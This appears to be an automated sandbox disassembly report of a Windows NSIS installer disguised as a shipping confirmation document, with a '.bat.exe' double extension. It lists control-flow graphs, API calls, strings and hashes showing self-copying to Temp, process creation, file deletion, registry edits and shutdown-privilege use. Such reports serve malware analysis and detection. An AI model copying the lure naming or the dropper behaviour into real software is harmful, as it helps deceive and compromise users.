6095->6096 6097 401a3e ExpandEnvironmentStringsW 6096->6097 6098 401a52 6097->6098 6099 401a65 6097->6099 6098->6099 6100 401a57 lstrcmpW 6098->6100 6100->6099 4979 4023b7 4980 4023c5 4979->4980 4981 4023bf 4979->4981 4983 4023d3 4980->4983 4984 402dab 21 API calls 4980->4984 4982 402dab 21 API calls 4981->4982 4982->4980 4985 402dab 21 API calls 4983->4985 4987 4023e1 4983->4987 4984->4983 4985->4987 4986 402dab 21 API calls 4988 4023ea WritePrivateProfileStringW 4986->4988 4987->4986 6101 404737 lstrcpynW lstrlenW 6107 733b2d43 6108 733b2d5b 6107->6108 6109 733b162f 2 API calls 6108->6109 6110 733b2d76 6109->6110 6111 4014b8 6112 4014be 6111->6112 6113 401389 2 API calls 6112->6113 6114 4014c6 6113->6114 4989 402439 4990 402441 4989->4990 4991 40246c 4989->4991 4992 402deb 21 API calls 4990->4992 4993 402dab 21 API calls 4991->4993 4994 402448 4992->4994 4995 402473 4993->4995 4996 402452 4994->4996 4999 402480 4994->4999 5001 402e69 4995->5001 4998 402dab 21 API calls 4996->4998 5000 402459 RegDeleteValueW RegCloseKey 4998->5000 5000->4999 5002 402e76 5001->5002 5003 402e7d 5001->5003 5002->4999 5003->5002 5005 402eae 5003->5005 5006 4064ef RegOpenKeyExW 5005->5006 5007 402edc 5006->5007 5008 402f91 5007->5008 5009 402ee6 5007->5009 5008->5002 5010 402eec RegEnumValueW 5009->5010 5019 402f0f 5009->5019 5011 402f76 RegCloseKey 5010->5011 5010->5019 5011->5008 5012 402f4b RegEnumKeyW 5013 402f54 RegCloseKey 5012->5013 5012->5019 5014 406a76 5 API calls 5013->5014 5016 402f64 5014->5016 5015 402eae 6 API calls 5015->5019 5017 402f86 5016->5017 5018 402f68 RegDeleteKeyW 5016->5018 5017->5008 5018->5008 5019->5011 5019->5012 5019->5013 5019->5015 6115 40173a 6116 402dab 21 API calls 6115->6116 6117 401741 SearchPathW 6116->6117 6118 40175c 6117->6118 6119 401d3d 6120 402d89 21 API calls 6119->6120 6121 401d44 6120->6121 6122 402d89 21 API calls 6121->6122 6123 401d50 GetDlgItem 6122->6123 6124 40263d 6123->6124

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 52 40383a-40383d 45->52 53 40383f 45->53 54 403884-403889 46->54 55 40389f-4038d9 46->55 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 52->46 52->53 53->46 54->55 61 40388b-403893 54->61 57 4038e1-4038e3 55->57 58 4038db-4038df 55->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->55 66->67 67->55 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 87 403a5d-403a83 call 405c4d lstrlenW call 406682 83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 106 403a2e-403a44 call 406682 * 2 86->106 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 97 403a06-403a0a 91->97 98 4039ff-403a04 91->98 92->93 104 403c36-403c41 ExitWindowsEx 93->104 105 403c2a-403c34 93->105 97->91 99 403a0c 97->99 98->97 98->99 99->83 104->84 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 00403668
                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                                            • OleInitialize.OLE32(00000000), ref: 00403783
                                                                            • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                                            • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",00000020,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403945
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403961
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                                            • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                                              • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                            • wsprintfW.USER32 ref: 00403AC4
                                                                            • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                                            • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                                              • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                                              • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                              • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                              • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(74DF3420,00425F98,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                                              • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                                            • ExitProcess.KERNEL32 ref: 00403BB2
                                                                            • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                                            • ExitProcess.KERNEL32 ref: 00403C5C
                                                                              • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
                                                                            • API String ID: 1813718867-3695584748
                                                                            • Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                            • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                                            • Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                            • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 357 405d8e-405db4 call 406059 360 405db6-405dc8 DeleteFileW 357->360 361 405dcd-405dd4 357->361 362 405f4a-405f4e 360->362 363 405dd6-405dd8 361->363 364 405de7-405df7 call 406682 361->364 365 405ef8-405efd 363->365 366 405dde-405de1 363->366 370 405e06-405e07 call 405f9d 364->370 371 405df9-405e04 lstrcatW 364->371 365->362 369 405eff-405f02 365->369 366->364 366->365 372 405f04-405f0a 369->372 373 405f0c-405f14 call 4069df 369->373 374 405e0c-405e10 370->374 371->374 372->362 373->362 381 405f16-405f2a call 405f51 call 405d46 373->381 377 405e12-405e1a 374->377 378 405e1c-405e22 lstrcatW 374->378 377->378 380 405e27-405e43 lstrlenW FindFirstFileW 377->380 378->380 382 405e49-405e51 380->382 383 405eed-405ef1 380->383 397 405f42-405f45 call 405707 381->397 398 405f2c-405f2f 381->398 387 405e71-405e85 call 406682 382->387 388 405e53-405e5b 382->388 383->365 386 405ef3 383->386 386->365 399 405e87-405e8f 387->399 400 405e9c-405ea7 call 405d46 387->400 391 405ed0-405ee0 FindNextFileW 388->391 392 405e5d-405e65 388->392 391->382 396 405ee6-405ee7 FindClose 391->396 392->387 393 405e67-405e6f 392->393 393->387 393->391 396->383 397->362 398->372 401 405f31-405f40 call 405707 call 406442 398->401 399->391 402 405e91-405e9a call 405d8e 399->402 410 405ec8-405ecb call 405707 400->410 411 405ea9-405eac 400->411 401->362 402->391 410->391 414 405ec0-405ec6 411->414 415 405eae-405ebe call 405707 call 406442 411->415 414->391 415->391
                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405DB7
                                                                            • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405DFF
                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405E22
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405E28
                                                                            • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"), ref: 00405E38
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                                            • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                                            Strings
                                                                            • \*.*, xrefs: 00405DF9
                                                                            • "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe", xrefs: 00405D97
                                                                            • POB, xrefs: 00405DE7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"$POB$\*.*
                                                                            • API String ID: 2035342205-1340378847
                                                                            • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                            • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                                            • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                            • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 714 406da0-406da5 715 406e16-406e34 714->715 716 406da7-406dd6 714->716 717 40740c-407421 715->717 718 406dd8-406ddb 716->718 719 406ddd-406de1 716->719 723 407423-407439 717->723 724 40743b-407451 717->724 720 406ded-406df0 718->720 721 406de3-406de7 719->721 722 406de9 719->722 725 406df2-406dfb 720->725 726 406e0e-406e11 720->726 721->720 722->720 727 407454-40745b 723->727 724->727 728 406e00-406e0c 725->728 729 406dfd 725->729 730 406fe3-407001 726->730 731 407482-40748e 727->731 732 40745d-407461 727->732 736 406e76-406ea4 728->736 729->728 734 407003-407017 730->734 735 407019-40702b 730->735 739 406c24-406c2d 731->739 737 407610-40761a 732->737 738 407467-40747f 732->738 740 40702e-407038 734->740 735->740 741 406ec0-406eda 736->741 742 406ea6-406ebe 736->742 743 407626-407639 737->743 738->731 744 406c33 739->744 745 40763b 739->745 747 40703a 740->747 748 406fdb-406fe1 740->748 746 406edd-406ee7 741->746 742->746 749 40763e-407642 743->749 751 406c3a-406c3e 744->751 752 406d7a-406d9b 744->752 753 406cdf-406ce3 744->753 754 406d4f-406d53 744->754 745->749 755 406eed 746->755 756 406e5e-406e64 746->756 757 406fb6-406fba 747->757 758 40714b-407158 747->758 748->730 750 406f7f-406f89 748->750 763 4075ce-4075d8 750->763 764 406f8f-406fb1 750->764 751->743 759 406c44-406c51 751->759 752->717 765 406ce9-406d02 753->765 766 40758f-407599 753->766 761 406d59-406d6d 754->761 762 40759e-4075a8 754->762 775 406e43-406e5b 755->775 776 4075aa-4075b4 755->776 767 406f17-406f1d 756->767 768 406e6a-406e70 756->768 769 406fc0-406fd8 757->769 770 4075c2-4075cc 757->770 758->739 759->745 771 406c57-406c9d 759->771 772 406d70-406d78 761->772 762->743 763->743 764->758 777 406d05-406d09 765->777 766->743 773 406f7b 767->773 774 406f1f-406f3d 767->774 768->736 768->773 769->748 770->743 778 406cc5-406cc7 771->778 779 406c9f-406ca3 771->779 772->752 772->754 773->750 780 406f55-406f67 774->780 781 406f3f-406f53 774->781 775->756 776->743 777->753 782 406d0b-406d11 777->782 786 406cd5-406cdd 778->786 787 406cc9-406cd3 778->787 783 406ca5-406ca8 GlobalFree 779->783 784 406cae-406cbc GlobalAlloc 779->784 785 406f6a-406f74 780->785 781->785 788 406d13-406d1a 782->788 789 406d3b-406d4d 782->789 783->784 784->745 792 406cc2 784->792 785->767 793 406f76 785->793 786->777 787->786 787->787 790 406d25-406d35 GlobalAlloc 788->790 791 406d1c-406d1f GlobalFree 788->791 789->772 790->745 790->789 791->790 792->778 795 4075b6-4075c0 793->795 796 406efc-406f14 793->796 795->743 796->767
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                            • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                                            • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                            • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(74DF3420,00425F98,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,C:\Users\user\AppData\Local\Temp\nsx45AB.tmp,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                                            • FindClose.KERNEL32(00000000), ref: 004069F6
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\nsx45AB.tmp, xrefs: 004069DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2124820348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2124787932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124836186.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124851901.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2124947293.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsx45AB.tmp
                                                                            • API String ID: 2295610775-247911329
                                                                            • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                            • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                                            • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                            • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 151 403d54-403d6c call 406a76 154 403d80-403db7 call 406550 151->154 155 403d6e-403d7e call 4065c9 151->155 160 403db9-403dca call 406550 154->160 161 403dcf-403dd5 lstrcatW 154->161 164 403dda-403e03 call 40402a call 406059 155->164 160->161 161->164 169 403e95-403e9d call 406059 164->169 170 403e09-403e0e 164->170 176 403eab-403ed0 LoadImageW 169->176 177 403e9f-403ea6 call 4066bf 169->177 170->169 171 403e14-403e3c call 406550 170->171 171->169 178 403e3e-403e42 171->178 180 403f51-403f59 call 40140b 176->180 181 403ed2-403f02 RegisterClassW 176->181 177->176 182 403e54-403e60 lstrlenW 178->182 183 403e44-403e51 call 405f7e 178->183 195 403f63-403f6e call 40402a 180->195 196 403f5b-403f5e 180->196 184 404020 181->184 185 403f08-403f4c SystemParametersInfoW CreateWindowExW 181->185 189 403e62-403e70 lstrcmpiW 182->189 190 403e88-403e90 call 405f51 call 406682 182->190 183->182 188 404022-404029 184->188 185->180 189->190 194 403e72-403e7c GetFileAttributesW 189->194 190->169 199 403e82-403e83 call 405f9d 194->199 200 403e7e-403e80 194->200 204 403f74-403f8e ShowWindow call 406a06 195->204 205 403ff7-403fff call 4057da 195->205 196->188 199->190 200->190 200->199 212 403f90-403f95 call 406a06 204->212 213 403f9a-403fac GetClassInfoW 204->213 210 404001-404007 205->210 211 404019-40401b call 40140b 205->211 210->196 214 40400d-404014 call 40140b 210->214 211->184 212->213 217 403fc4-403ff5 DialogBoxParamW call 40140b call 403ca4 213->217 218 403fae-403fbe GetClassInfoW RegisterClassW 213->218 214->196 217->188 218->217
                                                                            APIs
                                                                              • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                              • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                            • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe",00008001), ref: 00403DD5
                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420), ref: 00403E55
